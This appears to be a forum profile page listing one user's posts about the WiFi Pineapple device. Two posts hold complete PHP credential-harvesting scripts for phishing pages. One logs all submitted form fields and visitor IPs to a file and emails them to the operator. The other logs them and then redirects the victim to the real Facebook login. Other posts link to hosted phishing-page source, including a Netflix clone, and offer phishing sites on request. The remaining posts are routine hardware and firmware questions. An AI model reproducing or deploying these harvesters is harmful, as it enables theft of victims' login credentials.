Jump to content

Gamehacker953

Active Members
  • Posts

    18
  • Joined

  • Last visited

  • Days Won

    1

Recent Profile Visitors

1,108 profile views

Gamehacker953's Achievements

Newbie

Newbie (1/14)

  1. I would like to share my php page that logs the POST variables. I think its quite good for people who want instant alert for when someone triggers it. <?php // This is the login.php script i use. It will log to a file AND email it to you so you can check it when ever. The file logging is a backup. $email = "POST DATA\n---------------------------------\n"; function logger($value, $key) { global $email; $email .= $key." = ".$value."\n\r"; } //$file="/usb/log/phish.log"; $file="phish.log"; $time = date("F j, Y, g:i a"); //$basicdata = "IP: ".$_SERVER['REMOTE_ADDR']." logged in at ".$time.""; $basicdata = "IP: [snip] logged in at ".$time.""; header ('Location: '.$file); $handle = fopen($file, "a"); fwrite($handle, $basicdata); fwrite($handle, "\r\n"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); /* -----------------EMAIL---------------- */ array_walk($_POST, "logger");; $headers = "From: Phishing <Phishing@wifipineappleattack.comet>\r\n"; $headers .= "Organization: CHANGE ME!!!\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "Content-type: text/plain; charset=iso-8859-1\r\n"; $headers .= "X-Priority: 3\r\n"; $headers .= "X-Mailer: PHP".phpversion()."\r\n"; mail("email@email.com", "IP: ".$_SERVER['REMOTE_ADDR']." logged in at ".$time.".", $email, $headers); exit; ?>
  2. i will have to see i messed up my usb for my pineapple and going to redo it soon but dont have much time atm so idk when i can do it.
  3. oh if anyone wanted the netflix source http://jamez.dyndns.org/coding/phishing/source/netflix and the php logger i use http://jamez.dyndns.org/coding/phishing/source/phish_page its good as it will send a email when someone uses it and log their ips as well which with the pineapple can help with id'ing mac addresses to users.
  4. i could attempt to make one if needed just give me some time with the templates of other mods and i will see what i can do.
  5. i wish you the best of luck sir and hopefully i will make a mod for the pineapple that will do something like that but just phising.
  6. If anyone wants a phising site PM me and i will send it to you i will start working on a netflix one and may post it here. I have done some awhile back that people asked for (mostly Facebook and hotmail thou). EDIT: want something like this? http://jamez.dyndns.org/coding/phishing/netflix.php DO NOT ENTER REAL DETAILS!
  7. Is there a way you can add a option to update using the beta's? would be helpful to people testing the firmware for you all they do is go to update and boom its downloading and updating.
  8. i love you btw <3 even thou i brought the T-Link but hey i have two now :D thanks for all the hard work and putting in all the suggestions :3
  9. Is there anyway to add more driver support. I have a usb wifi card that has RT2870/RT3070 Drivers and the kernel you use for the pineapple is a newer one maybe update the kmod-* drivers to use more wifi cards? Unless there is a different way to get more drivers then tell em :P
  10. it would be cool to get the medialink to work i found the drivers if you want them. http://www.medialinkproducts.com/support.php the MWN-USB150N linux driver i cant seem to get it installed right.
  11. I brought one and so far it's great haven't had a problem with it yet even charged my phone iPod and pineapple at the same time :D
  12. weird i updated a few days ago. Worked fine then, but now.... its just blinks the WPS all the time updating/fresh flashing isnt working.. takes forever and i think i may need to get a cord to do a serial flash. Anyone else have this problem? or is it something i did. i can still access the webgui and the ssh tunnel just blinking and not updating.
  13. sorry for bumping if this isnt the right thread. I borught the same MediaLink USB but i cant get it to work with the pineapple how did you get it to work? or can someone link me one that works with the pineapple..
  14. you can always ssh to the pineapple and add a index2.html file to the pineapples /www/ to have the page there. I posted in another topic a page to phish with if you ever want to get dirty :P its all fun thou
  15. this is the page that is called from the phishing page. i call it parse.php call it whatever &lt;?php $time = date("F j, Y, g:i a"); header ('Location: https://www.facebook.com/login.php?login_attempt=1 '); $handle = fopen("fblog.txt", "a"); fwrite($handle, $_SERVER['REMOTE_ADDR']); fwrite($handle, "\r\n"); fwrite($handle, $time); fwrite($handle, "\r\n"); foreach($_POST as $variable =&gt; $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?&gt; this should do what you need and you may need a few to change around was trying to get a varible one setup so you have one that logs in different places but it did work well keeps getting a array error getting the $_GET from the page. I am also guessing you know how to make a phising page so i might not post that (dont know if its against forum rules or not. If needed i can PM them to you somehow. Enjoy ^_^ Happy Hacking
×
×
  • Create New...